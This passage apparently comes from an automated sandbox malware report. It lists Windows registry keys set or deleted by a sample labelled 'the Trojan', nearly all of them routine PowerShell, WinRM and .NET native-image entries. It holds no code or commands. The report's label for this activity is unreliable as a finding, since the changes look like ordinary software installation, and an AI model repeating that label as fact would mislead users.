[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"FuncName" = "PsIsMyFileType"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"URLInfoAbout" = "http://go.microsoft.com/fwlink/?LinkID=163792"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\KB968930]
"RegistryLocation" = " HKLM,SOFTWARE\Microsoft\Updates\KB968930\SP10\KB968930"
[HKCR\Interface\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\NumMethods]
"(Default)" = "4"
[HKLM\System\CurrentControlSet\Services\Eventlog\Microsoft-Windows-Forwarding/Operational\EventForwarder-Operational]
"TypesSupported" = "7"
[HKCR\CLSID\{7DE087A5-5DCB-4df7-BB12-0924AD8FBD9A}\InprocServer32]
"ThreadingModel" = "Both"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ\Regular]
"Guid" = "24b9a175-8716-40e0-9b2b-785de75b1e67"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"SupportsCompatListeners" = "1"
[HKCR\Interface\{F73C1438-71B4-4D91-AD13-1F889A03AC67}]
"(Default)" = "IShell"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllRemoveSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"(Default)" = ""
[HKCR\CLSID\{f4f7d085-cd01-43f9-899d-179c6df5ddad}\InprocServer32]
"(Default)" = "%System%\winrmprov.dll"
[HKCR\.ps1]
"(Default)" = "Microsoft.PowerShellScript.1"
[HKCR\Interface\{EFFAEAD7-7EC8-4716-B9BE-F2E7E9FB4ADB}\TypeLib]
"Version" = "1.0"
[HKLM\System\CurrentControlSet\Services\WinRM]
"ObjectName" = "NT AUTHORITY\NetworkService"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\System\CurrentControlSet\Services\Eventlog\System\EventForwarder]
"EventMessageFile" = "%systemroot%\system32\wevtfwd.dll"
[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCR\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}\LocalServer32]
"(Default)" = "%System%\winrshost.exe"
[HKCR\Interface\{2D53BDAA-798E-49E6-A1AA-74D01256F411}\TypeLib]
"(Default)" = "{F010BE25-296D-4036-980F-5A0669A17577}"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\MSMQ]
"Active" = "1"
[HKCR\CLSID\{9678f47f-2435-475c-b24a-4606f8161c16}]
"(Default)" = "Microsoft Windows WSMan Provider Host"
[HKLM\SOFTWARE\Microsoft\PowerShell\1]
"PID" = "89383-100-0001260-04309"
[HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine]
"ConsoleHostAssemblyName" = "Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil"
[HKCR\.psd1]
"(Default)" = "Microsoft.PowerShellData.1"
[HKCR\Interface\{F3457CA9-ABB9-4FA5-B850-90E8CA300E7F}]
"(Default)" = "IWSManEnumerator"
[HKCR\CLSID\{F73C1438-71B4-4D91-AD13-1F889A03AC67}\InprocServer32]
"(Default)" = "%System%\winrssrv.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup]
"ServicePackCachePath" = "c:\windows\ServicePackFiles\ServicePackCache"
[HKLM\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351}]
"DLL" = "%System%\WindowsPowerShell\v1.0\pwrshsip.dll"
[HKLM\System\CurrentControlSet\Services\Eventlog\Windows PowerShell\PowerShell]
"EventMessageFile" = "%System%\WindowsPowerShell\v1.0\pwrshmsg.dll"
[HKCR\Interface\{F704E861-9E52-464F-B786-DA5EB2320FDD}\TypeLib]
"Version" = "1.0"
The following service will be launched automatically at system boot:
[HKLM\System\CurrentControlSet\Services\SENS]
"Start" = "2"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\b0c:111dc8\iis]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\Oc Manager\TemporaryData\b0c:111dc8]
The process mscorsvw.exe:2656 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"MVID" = "F0 07 EE 1B F5 48 BA 76 1B A6 16 F4 C3 5B 15 8E"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5c]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\6abb48d8\39\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\41470f34\2\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\168b424e\2b\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"DisplayName" = "Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"ConfigString" = "ZAP--0000-0000"
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"SIG" = "1D 3D FC F9 F8 82 BC 47 B7 60 1D 39 80 29 76 15"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"DisplayName" = "Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5c]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF E1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF E1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EA 2A A3 BD 8F 9C C2 04 80 FB 4F AA AA A3 71 A1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"ConfigMask" = "4361"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "92"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"LastModTime" = "60 50 5C EB C7 D0 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\638045d1\2c\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5a]
The process mscorsvw.exe:1088 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8D EE D5 6A F7 F8 C8 70 1B 65 FD 10 35 25 5F A2"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:3536 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E6 3B C1 32 D2 4A 46 3F AF 15 8A BD 50 C7 5C F3"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2644b2e9\635b32a7\66]
"ILDependencies" = "44 18 F2 39 EC CB 26 0B 6F 00 00 00 01 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index64]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF E1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2644b2e9\635b32a7\66]
"ConfigMask" = "4361"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "100"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\2644b2e9\635b32a7]
"66" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2644b2e9\635b32a7\66]
"ConfigString" = "ZAP--0000-0000"
"MVID" = "9D 8E 8F 7B 7A E9 50 D8 65 44 54 05 97 83 7B 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f\InvertDependencies\2644b2e9\635b32a7]
"66" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2644b2e9\635b32a7\66]
"DisplayName" = "Microsoft.WSMan.Runtime,1.0.0.0,,31bf3856ad364e35"
"Status" = "0"
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index64]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF E1"
"SystemStoreChangeId" = "209"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\2644b2e9\635b32a7]
"66" = ""
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index62]
The process mscorsvw.exe:3068 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2C 82 E9 21 79 74 AF 45 A4 BA 60 99 EF 75 E0 F3"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
The process mscorsvw.exe:2320 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\7ac727df\3ef4663b]
"F" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"ConfigMask" = "4361"
"DisplayName" = "Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 81"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"SIG" = "EC BB F6 79 DE 07 9A 4F A7 CE DF 48 D6 49 CE 93"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"ConfigString" = "ZAP--0000-0000"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5b]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 81"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"LastModTime" = "02 AD DA EB C7 D0 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\3ef4663b\f\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\7ac727df\3ef4663b]
"F" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"DisplayName" = "Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AF 2E 63 64 29 E1 19 60 BB 16 A3 0B 46 88 2E 1E"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "91"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"MVID" = "13 FC 3D AE F5 85 09 8F 11 91 1F 8F 72 AC 1C EA"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5b]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\7ac727df\3ef4663b]
"F" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index59]
The process mscorsvw.exe:524 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\182177d0\3319830e\5a]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\31cfc12a\67e55a12\63]
"SIG" = "B7 6F 43 3B 5E 11 DE 4E B3 DF 75 E5 9F 64 67 8F"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\67e63d5c\6\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FD"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\77ccecdd\61ffc130\a\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\31cfc12a\67e55a12\63]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\182177d0\3319830e\5a]
"ConfigMask" = "4361"
"ConfigString" = "ZAP--0000-0000"
"ILDependencies" = "DD EC CC 77 30 C1 FF 61 0A 00 00 00 03 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\31cfc12a\67e55a12\63\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\182177d0\3319830e\5a]
"DisplayName" = "Microsoft.PowerShell.GPowerShell,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2ffb0c52\5076361\3\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\31cfc12a\67e55a12\63]
"LastModTime" = "08 06 A8 F1 C7 D0 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\182177d0\3319830e\5a]
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\31cfc12a\67e55a12\63]
"DisplayName" = "Microsoft.PowerShell.GPowerShell,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index60]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FD"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "90 A9 0D AF 41 FE D0 66 89 30 D7 B7 36 F5 70 B8"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\182177d0\3319830e\5a]
"MVID" = "BE 89 7C E6 CB 7D 25 17 02 86 EA BC EA E9 F4 1E"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\67e63d5c\6\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6e35940e\3a9b43f3\4\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\268e923b\24\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "96"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index60]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5e]
The process mscorsvw.exe:2152 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "07 AF D3 C8 F0 C7 6C 59 00 F6 2A B5 BF FB 1E 95"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:420 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5D 27 4D 31 20 A3 4A 0B FB 10 9D 96 D0 03 84 D6"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:2408 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "52 16 9C 48 B1 82 98 65 70 46 6E 3A F3 5D 66 9D"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:2360 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
